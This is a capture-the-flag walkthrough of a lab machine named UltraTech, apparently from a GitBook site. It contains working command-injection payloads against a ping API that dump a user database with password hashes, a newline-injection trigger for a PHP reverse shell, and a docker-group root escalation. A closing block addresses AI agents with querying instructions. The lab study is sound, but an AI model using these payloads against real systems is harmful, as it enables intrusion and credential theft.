# UltraTech {% embed url="" %} ## Enumeration ### nmap ```bash PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.3 22/tcp open ssh syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 dc:66:89:85:e7:05:c2:a5:da:7f:01:20:3a:13:fc:27 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDiFl7iswZsMnnI2RuX0ezMMVjUXFY1lJmZr3+H701ZA6nJUb2ymZyXusE/wuqL4BZ+x5gF2DLLRH7fdJkdebuuaMpQtQfEdsOMT+JakQgCDls38FH1jcrpGI3MY55eHcSilT/EsErmuvYv1s3Yvqds6xoxyvGgdptdqiaj4KFBNSDVneCSF/K7IQdbavM3Q7SgKchHJUHt6XO3gICmZmq8tSAdd2b2Ik/rYzpIiyMtfP3iWsyVgjR/q8oR08C2lFpPN8uSyIHkeH1py0aGl+V1E7j2yvVMIb4m3jGtLWH89iePTXmfLkin2feT6qAm7acdktZRJTjaJ8lEMFTHEijJ | 256 c3:67:dd:26:fa:0c:56:92:f3:5b:a0:b3:8d:6d:20:ab (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLy2NkFfAZMY462Bf2wSIGzla3CDXwLNlGEpaCs1Uj55Psxk5Go/Y6Cw52NEljhi9fiXOOkIxpBEC8bOvEcNeNY= | 256 11:9b:5a:d6:ff:2f:e4:49:d2:b5:17:36:0e:2f:1d:2f (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEipoohPz5HURhNfvE+WYz4Hc26k5ObMPnAQNoUDsge3 8081/tcp open http syn-ack ttl 61 Node.js Express framework |_http-cors: HEAD GET POST PUT DELETE PATCH |_http-title: Site doesn't have a title (text/html; charset=utf-8). | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS 31331/tcp open http syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu)) | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-favicon: Unknown favicon MD5: 15C1B7515662078EF4B5C724E2927A96 |_http-title: UltraTech - The best of technology (AI, FinTech, Big Data) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). ``` ### Web page #### port(31331) ![image.png](/files/zlvXSRDVjA7alQ8Tqilm)

```bash ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://10.10.41.142:31331/FUZZ -ic images [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 429ms] [Status: 200, Size: 6092, Words: 393, Lines: 140, Duration: 3616ms] css [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 411ms] js [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 422ms] javascript [Status: 301, Size: 326, Words: 20, Lines: 10, Duration: 425ms] server-status [Status: 403, Size: 303, Words: 22, Lines: 12, Duration: 490ms] ```

#### port 8081

The question got me baffled and it turns out to be the page’s sub directories which are **auth** and **ping** ```bash ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://10.10.41.142:8081/FUZZ -ic [Status: 200, Size: 20, Words: 3, Lines: 1, Duration: 453ms] auth [Status: 200, Size: 39, Words: 8, Lines: 1, Duration: 423ms] ping [Status: 500, Size: 1094, Words: 52, Lines: 11, Duration: 421ms] ``` ping

auth

### api Let’s see how the api really works, we can open the file api.js under the main webpage’s js directory ```jsx (function() { console.warn('Debugging ::'); function getAPIURL() { return `${window.location.hostname}:8081` } function checkAPIStatus() { const req = new XMLHttpRequest(); try { const url = `http://${getAPIURL()}/ping?ip=${window.location.hostname}` req.open('GET', url, true); req.onload = function (e) { if (req.readyState === 4) { if (req.status === 200) { console.log('The api seems to be running') } else { console.error(req.statusText); } } }; req.onerror = function (e) { console.error(xhr.statusText); }; req.send(null); } catch (e) { console.error(e) console.log('API Error'); } } checkAPIStatus() const interval = setInterval(checkAPIStatus, 10000); const form = document.querySelector('form') form.action = `http://${getAPIURL()}/auth`; })(); ``` This code explicitly builds a URL to the `/ping` route and sends a GET request to it. This happens once immediately and then every 10 seconds. This is the **first used route** See the ping function, let’s recreate the query by assigning a ip to it, you can either do [localhost](http://localhost) or 127.0.0.1

#### Command injection So I just straight up go for command injection, after trying some payloads we get one!!

You can dump out the `utech.sqlite.db` file: `http://:8081/ping?ip=%20`cat%20utech.db.sqlite\`\` ```jsx zz��etableusersusersCREATE TABLE users ( login Varchar, password Varchar, type Int ��(r00t:f357a0c52799563c7c7b76c1e7543a32)admin:0d0ea5111e3c1def594c1684e3b9be84 ```

#### reverse shell This is another way to get in but just to let you know how to trigger it, and yes need the file transferred to the target We first use `wget` and trigger it using `php`

```jsx http://10.10.41.142:8081/ping?ip=127.0.0.1%0Aphp%20php-reverse-shell.php ``` #### Misc We can login using the creds we found and here you can see some messages

```jsx Restricted area Hey r00t, can you please have a look at the server's configuration? The intern did it and I don't really trust him. Thanks! lp1 ``` ### Privilege escalation Log in as r00t via ssh

Turns out he’s in the docker group which means it can execute the payload in GTFObins After that go in to `/root/.ssh` and then cat the `id_rsa` out it’s the answer! --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://vix-w1zzer.gitbook.io/vixwizzer/walkthroughs/ultratech.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.